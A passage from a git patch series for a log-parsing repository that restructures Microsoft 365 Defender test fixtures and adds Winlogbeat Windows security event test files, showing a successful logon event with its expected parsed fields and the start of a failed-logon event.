\"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 6077ecfdc..3e55ad2b0 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json index f33a1eb87..55684497d 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 3cedbfdb3..5a6e54961 100644 --- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 3a5d48cd4..9304ca1cb 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -22,10 +22,14 @@ "@timestamp": "2024-09-24T14:18:11.864114Z", "action": { "properties": { - "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", - "InitiatingProcessFileSize": 11864, - "InitiatingProcessLogonId": "0", - "LogonId": "0" + "LogonId": "0", + "process": { + "parent": { + "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "FileSize": 11864, + "LogonId": "0" + } + } }, "type": "ProcessCreated" }, @@ -55,30 +59,36 @@ "-F", "smtpd_tls_protocols\\commandtest" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "grep -F smtpd_tls_protocols\\commandtest", - "executable": "/usr/test/platform-python3.6", - "hash": { - "md5": "eeeee2999444ddaaaaa08598b06eafe7", - "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", - "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" - }, - "name": "platform-python3.6", + "name": "grep", "parent": { + "args": [ + "--register", + "/usr/lib/python3.6/run.py" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "hash": { + "md5": "eeeee2999444ddaaaaa08598b06eafe7", + "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" + }, "name": "platform-python3.6", - "pid": 408229, - "start": "2024-09-24T14:17:34.790000Z" + "pid": 408996, + "start": "2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" }, "pid": 408996, "start": "2024-09-24T14:18:11.864114Z", - "user": { - "domain": "testdomain", - "name": "testaccount" - }, - "working_directory": "/usr/test" + "working_directory": "/usr/bin" }, "related": { "hash": [ From 943de11e6ab15711fa104a51ee2e5a41b90a3ab5 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 11:41:51 +0100 Subject: [PATCH 15/84] Enhancement/Winlogbeat: Addition of new events --- .../winlogbeat/tests/security_event_4624.json | 145 +++++++++++++ .../winlogbeat/tests/security_event_4625.json | 193 ++++++++++++++++++ .../winlogbeat/tests/security_event_4634.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4662.json | 105 ++++++++++ .../winlogbeat/tests/security_event_4672.json | 82 ++++++++ .../winlogbeat/tests/security_event_4689.json | 88 ++++++++ .../winlogbeat/tests/security_event_4720.json | 127 ++++++++++++ .../winlogbeat/tests/security_event_4722.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4723.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4725.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4726.json | 84 ++++++++ .../winlogbeat/tests/security_event_4768.json | 102 +++++++++ .../winlogbeat/tests/security_event_4769.json | 101 +++++++++ .../winlogbeat/tests/security_event_4798.json | 114 +++++++++++ .../winlogbeat/tests/security_event_5140.json | 5 - .../winlogbeat/tests/security_event_5145.json | 7 - 16 files changed, 1587 insertions(+), 12 deletions(-) create mode 100644 Beats/winlogbeat/tests/security_event_4624.json create mode 100644 Beats/winlogbeat/tests/security_event_4625.json create mode 100644 Beats/winlogbeat/tests/security_event_4634.json create mode 100644 Beats/winlogbeat/tests/security_event_4662.json create mode 100644 Beats/winlogbeat/tests/security_event_4672.json create mode 100644 Beats/winlogbeat/tests/security_event_4689.json create mode 100644 Beats/winlogbeat/tests/security_event_4720.json create mode 100644 Beats/winlogbeat/tests/security_event_4722.json create mode 100644 Beats/winlogbeat/tests/security_event_4723.json create mode 100644 Beats/winlogbeat/tests/security_event_4725.json create mode 100644 Beats/winlogbeat/tests/security_event_4726.json create mode 100644 Beats/winlogbeat/tests/security_event_4768.json create mode 100644 Beats/winlogbeat/tests/security_event_4769.json create mode 100644 Beats/winlogbeat/tests/security_event_4798.json diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..9e8cdfb26 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json @@ -0,0 +1,145 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json new file mode 100644 index 000000000..ac5882d46 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4625.json @@ -0,0 +1,193 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E